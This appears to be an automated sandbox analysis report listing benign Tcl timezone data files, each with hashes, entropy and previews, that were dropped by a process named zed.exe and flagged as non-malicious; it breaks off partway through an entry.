                                                                                                                                                                                                                                            SHA1:1953CD224FB2363B10372C0476760F3FB020CB00
                                                                                                                                                                                                                                            SHA-256:B3EE44B3526BEDFC25B806371D3C465FDBD6CC647F30BF093750651E4A0C1BE4
                                                                                                                                                                                                                                            SHA-512:31262DF034E084DA4CDB57B99178594C29129F61F3535E5D8245B8BB4AB6BF314307B0F5E58B74C349684CD761C9CDE44EB10407FB135BA6427D3D1E9DA99B40
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Paramaribo) {.. {-9223372036854775808 -13240 0 LMT}.. {-1861906760 -13252 0 PMT}.. {-1104524348 -13236 0 PMT}.. {-765317964 -12600 0 -0330}.. {465449400 -10800 0 -03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):496
                                                                                                                                                                                                                                            Entropy (8bit):4.444598497301421
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290OXmdH514YCvb8o1W4S9xRvhhHRVxORBYUNv:5tekdvYP1x52yq
                                                                                                                                                                                                                                            MD5:062ECA57C0B795780240CD7AFE70BDA0
                                                                                                                                                                                                                                            SHA1:89D71A11DD8D4E000F7FADBDDC77C4C1DC1195F7
                                                                                                                                                                                                                                            SHA-256:DFA0EC91804B789A1A7E1B1977710435D2589A5B54C1579C8E1F5BF96D2FD007
                                                                                                                                                                                                                                            SHA-512:7D123AA872E0B8286A26E338AE0F8E0D7A6F0F2EA8B1EBEC6DBB59477C812985CB246AD397D0901A58FDB7FF14171CF60169DC15C538B95C58BD2D46106A7A4D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Phoenix) {.. {-9223372036854775808 -26898 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-820519140 -25200 0 MST}.. {-796841940 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-56221200 -25200 0 MST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6613
                                                                                                                                                                                                                                            Entropy (8bit):3.8549788442269395
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5Ux+E2p3T6ZqrNSMEBPMcywh4NF5zCC7IOTWa1HW1241UWK9BDL+3XC4BMrS2LxP:KOfS0HY2iU7KKdFL6Aa2K4gSLf8e
                                                                                                                                                                                                                                            MD5:A720323DF122C70C1530788DB24700BA
                                                                                                                                                                                                                                            SHA1:20674BD7D84CC686ABBB5D6B36B520A5E9C813ED
                                                                                                                                                                                                                                            SHA-256:A89C580899AD2FF8DF45A783BB90D501DC32C28B92931CA18ABD13453E76244B
                                                                                                                                                                                                                                            SHA-512:02B71E537B9FDAF1B68E381F0007CCBBA53EB70719ED38F51B56C5BFA64C7E3D9797053C9DE3A920E5CAFA09BBC062FCED62B5D6B9213AFA8286B95DEDAB0532
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Port-au-Prince) {.. {-9223372036854775808 -17360 0 LMT}.. {-2524504240 -17340 0 PPMT}.. {-1670483460 -18000 0 EST}.. {421218000 -14400 1 EDT}.. {436334400 -18000 0 EST}.. {452062800 -14400 1 EDT}.. {467784000 -18000 0 EST}.. {483512400 -14400 1 EDT}.. {499233600 -18000 0 EST}.. {514962000 -14400 1 EDT}.. {530683200 -18000 0 EST}.. {546411600 -14400 1 EDT}.. {562132800 -18000 0 EST}.. {576050400 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607500000 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638949600 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671004000 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {702453600 -14400 1 EDT}.. {719992800 -18000 0 EST}.. {733903200 -14400 1 EDT}.. {752047200 -18000 0 EST}.. {765352800 -14400 1 EDT}.. {783496800 -18000 0 EST}.. {796802400 -14400 1 EDT}.. {814946400 -18000 0 EST}.. {828856800 -14400 1 EDT}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):207
                                                                                                                                                                                                                                            Entropy (8bit):4.919510214047913
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290e7490ppv:MByMYbpwt290190b
                                                                                                                                                                                                                                            MD5:4AB394CB233B101627136EB5E070CF9B
                                                                                                                                                                                                                                            SHA1:F00600CD2DB10FE157C3696F665B9759EEA85F99
                                                                                                                                                                                                                                            SHA-256:A4952380C89A6903FFE5BF8707B94B1BB72568FFD03DB04BF4D98E38AC82EEB7
                                                                                                                                                                                                                                            SHA-512:58F4AD08FA10F1884FA641C4EA778C0FC013EABBD68DF5DE04D5B301227396260C3D669DB33DD6A6B33F1550C24BBD7777D756DF0D61CEEAF5EC6541EDFA296C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Port_of_Spain) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.866417687745155
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/290msh490th4:MByMYdIp7t290v490I
                                                                                                                                                                                                                                            MD5:6B570E79FA2AA7D6CB1E56A11EE0A37C
                                                                                                                                                                                                                                            SHA1:396A2C9BBE4F264DD5A4F2E44D3E63C57F52186B
                                                                                                                                                                                                                                            SHA-256:52921EEA2A1925DF06CEA4638ED4128FAAA8FBA40ED4E0741650B419E5152DCB
                                                                                                                                                                                                                                            SHA-512:FA75A179664BED02A0F5BC1B7C3DD5F3E986544A151634BA4C4401476F5999714C89E240D9AF805484D1BEC04A1A562157FAEECA1603C4FF8CFFB424B9DEB560
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:America/Porto_Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1051
                                                                                                                                                                                                                                            Entropy (8bit):3.851275104153641
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Xe4QJnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/8:5kSeSFESoSQSrSsCSeSPS1cSQSQlSsSX
                                                                                                                                                                                                                                            MD5:03046BA6F8344C32AD7A22748DC871AB
                                                                                                                                                                                                                                            SHA1:AB9ED078D80AE99EF6DE4BF34AC45359B82D1284
                                                                                                                                                                                                                                            SHA-256:E6E6F6753E7D443052A64D4DB07B8D443CE13A573946E7D0A19CDD4BBA4A2F04
                                                                                                                                                                                                                                            SHA-512:620953BB4C8CF203262EC0C1F807543D24B9894C3B531AE57F7CEF630452CC9AC7CA41D43A6D8891F9CF17594E9EE34CF501F8508E7C0669A8E5EF9C70B6EAA3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Porto_Velho) {.. {-9223372036854775808 -15336 0 LMT}.. {-1767210264 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {5712012
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):283
                                                                                                                                                                                                                                            Entropy (8bit):4.781646667761219
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290piDm2OH9VoHvMlFoeVVF70ZVVFUFkzk/lLJpR/lAov:MB862908mdHvCvMlGe/J0Z/uFkzk/lL1
                                                                                                                                                                                                                                            MD5:E2E2E0D6677FFF2E37BBFC3522F2A9AA
                                                                                                                                                                                                                                            SHA1:4C1C93E14FBC00B8B1E78B8D9631599164305EB1
                                                                                                                                                                                                                                            SHA-256:2981248A9F14EBFC8791EC5453170376CBD549557E495EA0E331CC18556C958E
                                                                                                                                                                                                                                            SHA-512:F056B03EB9945823F5284C840E06E298DD2DE854F1555CD16D0BB19D962B73EF34A05683E6369B0D89CB7C3F7D082C312CCA6F8C6A0BB53F5C75FE4A863FCD95
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Puerto_Rico) {.. {-9223372036854775808 -15865 0 LMT}.. {-2233035335 -14400 0 AST}.. {-873057600 -10800 0 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3729
                                                                                                                                                                                                                                            Entropy (8bit):3.6253057710886956
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:2RPW7xUQjzoMUBI0nuUoDKlHslPlgiot7JC/Xk8NWse4r4g5xCEmSdLkUsZOn+ZW:247xUQjzoMUBI0nuUoDK6lPlgiot7JCV
                                                                                                                                                                                                                                            MD5:D4ECD2A380E55A10FB97AB1D29C619F3
                                                                                                                                                                                                                                            SHA1:AAAFF44590F08623BE6F61EA6EFF6488C99A73BF
                                                                                                                                                                                                                                            SHA-256:4E626BD8B9182E56ADA1E9276585E945957431EA9BEA949CE071305E4E3C70A2
                                                                                                                                                                                                                                            SHA-512:677EE7093A53B48DE526C5877DB7128E8746831FE0DC44A38EB84050757E6017C9471EEF9AFCCEEEB5794D1608E486840804C01BD6276EA53F3C7823B05ED62B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Punta_Arenas) {.. {-9223372036854775808 -17020 0 LMT}.. {-2524504580 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-736632000 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}.. {37767600 -14400 0 -04}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):196
                                                                                                                                                                                                                                            Entropy (8bit):4.926514352074701
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7pYHAIgppuRN/290ly90pl:MByMY/pcRt290w90X
                                                                                                                                                                                                                                            MD5:552FBD2FBAD42F79C7993124D9CCC54B
                                                                                                                                                                                                                                            SHA1:9029B7CCE8A5AD0F14C05FFBCDA4CA225DEC1708
                                                                                                                                                                                                                                            SHA-256:FEC74A3FCBD9B99FDFF24B54223DA187958697CBE756A54592F6171C69F1403F
                                                                                                                                                                                                                                            SHA-512:96315C32C1D0DEF804A560022DA12B3C63200A680F2A37D1B03E1C9EA413842EB6051E1C2315AE4E7C374280AD0E59832F834A8D6D66E259EF62735A77917ECE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:America/Rainy_River) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7614
                                                                                                                                                                                                                                            Entropy (8bit):3.8349162993762267
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Wi8h4ZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:bqOfA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:793DAEDB7E3077DE52DCC3C8A7CBEC5B
                                                                                                                                                                                                                                            SHA1:37562E9F28D51DED41FFD5FF2FF19E2E4E453B7A
                                                                                                                                                                                                                                            SHA-256:AA8866D58BEAB07548180628FF423887BBF48AADB1B55392B288F7310F94A9B1
                                                                                                                                                                                                                                            SHA-512:68A32B41DC2D3E730D6BE53656B0D566AB1BCC1E189A2FFDB5687A947EF4F4008BC17456F8CE0D59C838EEA87A44400231A44E6AB35BEDBF5D7779E1CD7EFD8A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rankin_Inlet) {.. {-9223372036854775808 0 0 -00}.. {-410227200 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1420
                                                                                                                                                                                                                                            Entropy (8bit):3.78262494063765
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5aLexyGcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaI1kR8nd:5eTChlvEw6kSSx5H4a8tf3fkuoYVZDm+
                                                                                                                                                                                                                                            MD5:4D12651CEE804EB9F29567CB37F12031
                                                                                                                                                                                                                                            SHA1:54B2613475B8BDB1DBCCA53A4895DA021F66BDC0
                                                                                                                                                                                                                                            SHA-256:A36AD4614FC9A2A433712B555156EDE03980B88EB91D8DC7E8B10451D6D7F7D3
                                                                                                                                                                                                                                            SHA-512:E6690F6B6DF613C8B7289A2DB71FBC9B87B997707A6C3B4B45BDE8F347082AE8C69F212BAACE50F3C04E325ABE0976AF1F61107BDF8A15D5B88F11FAE11A9D00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Recife) {.. {-9223372036854775808 -8376 0 LMT}.. {-1767217224 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1781
                                                                                                                                                                                                                                            Entropy (8bit):4.034282439637634
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290hjmdHfCv24Q1NAvHaE+YB+Q4kRcMxIeRUVX/SEQd1rRR9xRv0+Ro/wPjp:5EjeavTGOtAVvSRBpx0yq1epwD+yz+
                                                                                                                                                                                                                                            MD5:14B29B4391B643E5707096ADCC33C57E
                                                                                                                                                                                                                                            SHA1:B3F875ABB79C634C74307B7CB7B276B13AEE11D1
                                                                                                                                                                                                                                            SHA-256:50105E788288CF4C680B29BBDCDE94D8713A5361B38C6C469FD97CF05503FF7D
                                                                                                                                                                                                                                            SHA-512:D92A51547DF2C1AB6E6CDEFF34C07B755D3F6BB5E7DD1907693E7658EDE4D2BADC5DEFDB658ADD0F8D8F14B3B87CEA17BC00DAC364C5CB7ACBF8778C245276A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Regina) {.. {-9223372036854775808 -25116 0 LMT}.. {-2030202084 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1251651600 -21600 1 MDT}.. {-1238349600 -25200 0 MST}.. {-1220202000 -21600 1 MDT}.. {-1206900000 -25200 0 MST}.. {-1188752400 -21600 1 MDT}.. {-1175450400 -25200 0 MST}.. {-1156698000 -21600 1 MDT}.. {-1144000800 -25200 0 MST}.. {-1125248400 -21600 1 MDT}.. {-1111946400 -25200 0 MST}.. {-1032714000 -21600 1 MDT}.. {-1016992800 -25200 0 MST}.. {-1001264400 -21600 1 MDT}.. {-986148000 -25200 0 MST}.. {-969814800 -21600 1 MDT}.. {-954093600 -25200 0 MST}.. {-937760400 -21600 1 MDT}.. {-922039200 -25200 0 MST}.. {-906310800 -21600 1 MDT}.. {-890589600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-748450800 -21600 1 MDT}.. {-732729600 -25200 0 MST
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7610
                                                                                                                                                                                                                                            Entropy (8bit):3.8312000314798085
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:li8h4Z80NA604qSScBgN+4ctDzIVQ/c/3hNxTh:EqOzA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:541EACD872723603971058CB205121D7
                                                                                                                                                                                                                                            SHA1:8F7DFD5ECA2913846D9342839AE1C60882153DA0
                                                                                                                                                                                                                                            SHA-256:643CC43E3F906779C040E1F0C20E78D6E95CC7301B3C7370A8ADBCBD76A8C5E8
                                                                                                                                                                                                                                            SHA-512:971D06D3FB67B7AE79EEDB6D3EBB805B5992C2BF4A7166016B405E21BFB25D9A87A757E8065073D5FBEB9084F6F742269A5BF432BF2F03D30913DB092E1AB3A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Resolute) {.. {-9223372036854775808 0 0 -00}.. {-704937600 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {73391
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1112
                                                                                                                                                                                                                                            Entropy (8bit):3.8413073465060457
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Ybe/k5Yss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6Gs:505YsMw57XJh4CxUF/A6GTrtSUDwr
                                                                                                                                                                                                                                            MD5:7E23FDE0E158E8ED2E7536EDE70D2588
                                                                                                                                                                                                                                            SHA1:319052BE076DC79F130E807D68B11CCAA0636340
                                                                                                                                                                                                                                            SHA-256:28082D20872B61D6098D31D1C40F12464A946A933CD9AF74475C5AF384210890
                                                                                                                                                                                                                                            SHA-512:BE078ED12F05AB5CEE5D77212EB76A01A1BC52EEAA17E3B91D93B88D75E5281B6AF164E712A9AB0F57A21B3CDB20F6FCCADB73CAC4745B5D2E665D18F9F06B55
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rio_Branco) {.. {-9223372036854775808 -16272 0 LMT}.. {-1767209328 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {57120480
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                                                                                            Entropy (8bit):4.801485647578614
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/290rI5290/M7:MByMY/M7p/M16t290r190/M7
                                                                                                                                                                                                                                            MD5:90830F3B1F91FE48AC2944C7C92A3F6E
                                                                                                                                                                                                                                            SHA1:777377AE4959DDD2B472EB6041A23A5B93D64BB6
                                                                                                                                                                                                                                            SHA-256:0117D33D4F326AA536162D36A02439FBD5F2EB3B4F540B5BA91ED7747DDAC180
                                                                                                                                                                                                                                            SHA-512:20A371E4550E402AFEB83EF19EFFF6B3C0D7A68DCAA06AD894D04DB63B7096560E701C45B455B23A98BB20FE3B590F920219152415CA506AEDA427BB1381B826
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Rosario) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.869058214823402
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7ekHAIgpeON/290tX2U490eBn:MByMYMpJt290c90m
                                                                                                                                                                                                                                            MD5:F4E62378AA05771D348AA6DA516CD386
                                                                                                                                                                                                                                            SHA1:07FCA813693F7944CBCBB128F2F2FE32929D37A2
                                                                                                                                                                                                                                            SHA-256:3B4C2F3A5B9CD22A73F05187C032723D07BB53C9946D04D35E1BA1CB90CA0A62
                                                                                                                                                                                                                                            SHA-512:E9F6CEB824D656CA25A72BF8EB4347A22E1A8E40410F01E0C2EDE19ACAF32D76540399796B3EBC7781C8B5D48C1A6B2C856CA06158AE37D95C95CF0567DFA2E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Santa_Isabel) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1079
                                                                                                                                                                                                                                            Entropy (8bit):3.8200568741699223
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5zeUdunSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/h:52SeSFESoSQSrSsCSeSPS1cSQSQlSsSU
                                                                                                                                                                                                                                            MD5:7F2658032008F2C1308F121C2EBF2479
                                                                                                                                                                                                                                            SHA1:B6F24E818B4424C0DEF818C103D1DA5359958932
                                                                                                                                                                                                                                            SHA-256:4A397BD937DE1D7E6A941D18001B34D4CD195AEFD08951C30C7EE8E48656AA0E
